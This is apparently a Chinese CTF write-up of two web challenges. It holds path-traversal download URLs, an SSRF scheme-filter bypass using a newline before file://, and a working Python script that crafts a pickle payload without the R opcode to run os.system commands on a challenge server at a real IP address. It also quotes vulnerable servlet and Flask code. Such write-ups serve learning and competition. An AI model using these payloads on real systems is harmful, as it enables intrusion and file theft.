[toc]
java_url
任意文件下载:/download?filename=../../../../WEB-INF/web.xml,一依次下载三个文件,丢出一个poc:/download?filename=../../../../WEB-INF/classes/com/test2/aaa1/download.class
download.java
package com.test2.aaa1;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.net.URLEncoder;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
public class download extends HttpServlet {
private static final long serialVersionUID = 1;
/* access modifiers changed from: protected */
public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
doPost(request, response);
}
/* access modifiers changed from: protected */
public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
String fileName = request.getParameter("filename");
if (fileName.contains("environ")) {
response.getWriter().write("false");
return;
}
String fileName2 = new String(fileName.getBytes("ISO8859-1"), "UTF-8");
System.out.println("filename=" + fileName2);
if (fileName2 == null || !fileName2.toLowerCase().contains("flag")) {
String path = findFileSavePathByFileName(fileName2, getServletContext().getRealPath("/WEB-INF/upload"));
if (!new File(path + "/" + fileName2).exists()) {
request.setAttribute("message", "error");
request.getRequestDispatcher("/message2.jsp").forward(request, response);
return;
}
response.setHeader("content-disposition", "attachment;filename=" + URLEncoder.encode(fileName2.substring(fileName2.indexOf("_") + 1), "UTF-8"));
FileInputStream in = new FileInputStream(path + "/" + fileName2);
ServletOutputStream out = response.getOutputStream();
byte[] buffer = new byte[1024];
while (true) {
int len = in.read(buffer);
if (len > 0) {
out.write(buffer, 0, len);
} else {
in.close();
out.close();
return;
}
}
} else {
request.setAttribute("message", "no no no ");
request.getRequestDispatcher("/message2.jsp").forward(request, response);
}
}
public String findFileSavePathByFileName(String filename, String saveRootPath) {
int hashCode = filename.hashCode();
String dir = saveRootPath + "/" + (hashCode & 15) + "/" + ((hashCode & 240) >> 4);
File file = new File(dir);
if (!file.exists()) {
file.mkdirs();
}
return dir;
}
}testURL.java
package com.test2.aaa1;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
public class testURL extends HttpServlet {
/* access modifiers changed from: protected */
public void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
doPost(req, resp);
}
/* access modifiers changed from: protected */
public void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
String tartget_url = req.getParameter("url");
if (tartget_url.substring(0, tartget_url.indexOf(":")).matches("(?i)file|(?i)gopher|(?i)data")) {
resp.getWriter().write(String.valueOf(new StringBuilder().append("false")));
} else {
resp.getWriter().write(String.valueOf(getContent(tartget_url)));
}
}
public StringBuilder getContent(String url) throws IOException {
BufferedReader in = new BufferedReader(new InputStreamReader(new URL(url).openConnection().getInputStream()));
StringBuilder content = new StringBuilder();
while (true) {
String inputLine = in.readLine();
if (inputLine == null) {
return content;
}
content.append(inputLine);
content.append("\n");
}
}
}matches("(?i)file|(?i)gopher|(?i)data")过滤不严谨,/testURL?url=%0afile:///flag 即可绕过(团子 yyds)
ez_python
首届网刃杯工控ctf-ez-web 原题
源码提示:<!-- ?pic=1.jpg -->,任意文件读取喽,读出来是base64。先来一波 /proc/self/cmdline ,知道进程运行为 app.py ,有经验的师傅应该直接读app.py了,然后读取
import pickle
import base64
from flask import Flask, request
from flask import render_template,redirect,send_from_directory
import os
import requests
import random
from flask import send_file
app = Flask(__name__)
class User():
def __init__(self,name,age):
self.name = name
self.age = age
def check(s):
if b'R' in s:
return 0
return 1
@app.route("/")
def index():
try:
user = base64.b64decode(request.cookies.get('user'))
if check(user):
user = pickle.loads(user)
username = user["username"]
else:
username = "bad,bad,hacker"
except:
username = "CTFer"
pic = '{0}.jpg'.format(random.randint(1,7))
try:
pic=request.args.get('pic')
with open(pic, 'rb') as f:
base64_data = base64.b64encode(f.read())
p = base64_data.decode()
except:
pic='{0}.jpg'.format(random.randint(1,7))
with open(pic, 'rb') as f:
base64_data = base64.b64encode(f.read())
p = base64_data.decode()
return render_template('index.html', uname=username, pic=p )
if __name__ == "__main__":
app.run('0.0.0.0',port=8888)pickle的反序列化:从零开始python反序列化攻击:pickle原理解析 & 不用reduce的RCE姿势
弹shell失败了,用了雪姐姐的脚本嘿嘿
import requests
import pickle
import base64
#e = 'ls / -a'
e = 'cat /*'
s = pickle.dumps(e)
# print(s)
payload = b'c__main__\nUser\n)\x81}(V__setstate__\ncos\nsystem\nubV' + \
e.encode()+b' > /tmp/1.txt\nb.'
response = requests.get("http://116.62.239.41:4322/?pic=/tmp/1.txt",
cookies=dict(
user=base64.b64encode(payload).decode()))
for l in response.content.decode().split("\n"):
if "base64" in l:
l = l.split("\"")[1].split(",")[1]
print(base64.b64decode(l).decode())
